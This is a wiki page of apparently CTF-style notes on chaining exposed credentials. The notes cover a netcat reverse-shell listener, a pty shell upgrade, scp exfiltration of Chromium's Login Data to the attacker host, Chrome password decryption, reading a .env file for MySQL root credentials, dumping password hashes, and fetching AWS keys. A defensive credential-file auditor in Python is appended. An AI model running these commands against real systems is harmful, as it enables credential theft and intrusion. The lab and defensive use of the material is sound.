security:challenge:exposed_creds
Find Garry's Password
Start Reverse Shell Listener
root@kali$ nc -l 8000
Enhance Shell
garry@desktop$
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
echo $TERM
stty -a
stty raw -echo
fg
reset
--> xterm
Enable ssh and exfiltrate
garry@desktop$ ssh-keygen
--> copy/paste id_rsa.pub -> root@kali
scp .config/chromium/Default/Login\ Data root@10.5.4.3:/tmp
Get Chrome Password
root@kali$
apt-get install python3-pip
sudo pip install pycrypto
apt-get install sqlite3
cd /tmp
#sqlite3 Login\ Data 'select username_value, password_value from logins;'
./get_chrome_pass.py
Decrypting the string: b'v...'
b...e
ssh to intern Server
garry@desktop$ ssh 192.168.6.105
Find Bob's Password
garry@server-intern$
python -c 'import pty; pty.spawn("/bin/bash")'
cat /var/www/app/.env
MYSQL_ROOT_PASSWORD=t..r
MYSQL_USER=d..r
MYSQL_PASSWORD=xxx
MYSQL_DATABASE=xxx
cat /var/www/app/www/conf.php
<?php
$conf = [
'host'=>'localhost',
'user'=>getenv('MYSQL_USER'),
'password'=>getenv('MYSQL_PASSWORD'),
'dbname'=>'intern',
'port'=>3306,
'charset'=>'utf8'
];
?>
cat /var/www/app/www/login.php
// Prepare a select statement
$sql = "SELECT id, username, password FROM users WHERE username = ?";
mysql -h 192.168.6.105 -u root -p intern
-> t..r
mysql> select * from users;
+----+----------+----------------------------------+---------------------+
| id | username | password | created_at |
+----+----------+----------------------------------+---------------------+
| 1 | bob | xxx | 2021-06-26 10:35:43 |
| 2 | garry | xxx | 2021-06-26 10:35:43 |
+----+----------+----------------------------------+---------------------+
google for hash
--> b..7
Find AWS Keys
garry@server-intern$ ssh bob@192.168.6.22 cat /home/bob/.aws/credentials
[default]
aws_access_key_id = xxx
aws_secret_access_key = xxx
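Defender-side check for the three credential stores these notes harvest (the app .env, ~/.aws/credentials, Chromium's Login Data), as an added example that is not part of the original notes: it flags copies readable beyond their owner and keys that hold plaintext secrets. The key-name pattern, the /home/garry path and the sample tree are assumptions.

```python
import os
import re
import tempfile

# Added example: file names are from the notes; key pattern and sample tree are assumed.
SECRET_KEY = re.compile(r"^\s*(\w*(?:PASSWORD|SECRET|TOKEN)\w*)\s*=\s*\S", re.I | re.M)

def is_cred_store(dirpath, name):
    return name in (".env", "Login Data") or (
        name == "credentials" and os.path.basename(dirpath) == ".aws")

def audit(root):
    """Return sorted (relative path, issue) pairs for credential stores under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not is_cred_store(dirpath, name):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            mode = os.stat(path).st_mode & 0o777
            if mode & 0o044:  # group or other may read
                findings.append((rel, "mode %04o readable beyond owner" % mode))
            if name == "Login Data":
                continue  # SQLite file: check permissions only
            with open(path, encoding="utf-8", errors="replace") as fh:
                for m in SECRET_KEY.finditer(fh.read()):
                    findings.append((rel, "plaintext value for " + m.group(1)))
    return sorted(findings)

def build_sample(root):
    """Constructed tree mirroring the paths in the notes; all values are dummies."""
    samples = {
        "var/www/app/.env": ("MYSQL_ROOT_PASSWORD=dummy\nMYSQL_USER=dummy\n", 0o644),
        "home/bob/.aws/credentials": ("[default]\naws_access_key_id = dummy\n"
                                      "aws_secret_access_key = dummy\n", 0o600),
        "home/garry/.config/chromium/Default/Login Data": ("", 0o640),
    }
    for rel, (body, mode) in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp)
        print("\n".join(": ".join(f) for f in audit(tmp)))
```

Run audit("/") as root on each host to cover every user's home; a 0600 file still gets a plaintext finding because any process running as its owner can read it.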
security/challenge/exposed_creds.txt · Last modified: by wikiadm
